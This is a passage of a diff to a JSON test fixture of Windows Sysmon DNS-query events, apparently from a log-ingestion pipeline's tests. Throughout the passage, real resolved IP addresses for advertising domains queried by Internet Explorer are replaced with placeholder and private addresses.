prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1609,7 +1609,7 @@ "ProcessId": "2736", "QueryName": "pixel.advertising.com", "QueryStatus": "0", - "QueryResults": "type: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;", + "QueryResults": "type: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.841" }, @@ -1635,7 +1635,7 @@ "event_data": { "QueryName": "onevideosync.uplynk.com", "QueryStatus": "0", - "QueryResults": "type: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.844", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1664,7 +1664,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "log": { @@ -1717,7 +1717,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", @@ -1735,7 +1735,7 @@ "ProcessId": "2736", "QueryName": "ad.turn.com", "QueryStatus": "0", - "QueryResults": "type: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;", + "QueryResults": "type: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.956", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -1758,7 +1758,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -1775,7 +1775,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "level": "information", "event_data": { - "QueryResults": "type: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;", + "QueryResults": "type: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.005", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1798,7 +1798,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1821,7 +1821,7 @@ "ProcessId": "2736", "QueryName": "pm.w55c.net", "QueryStatus": "0", - "QueryResults": "type: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -1837,7 +1837,7 @@ { "@timestamp": "2021-05-05T15:30:51.697Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1864,7 +1864,7 @@ "channel": "Microsoft-Windows-Sysmon/Operational", "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.093", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1899,7 +1899,7 @@ "event_id": "22", "provider_name": "Microsoft-Windows-Sysmon", "event_data": { - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;", + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.099", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1915,7 +1915,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -1927,7 +1927,7 @@ "ProcessId": "2736", "QueryName": "cm.adgrx.com", "QueryStatus": "0", - "QueryResults": "type: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "type: 5 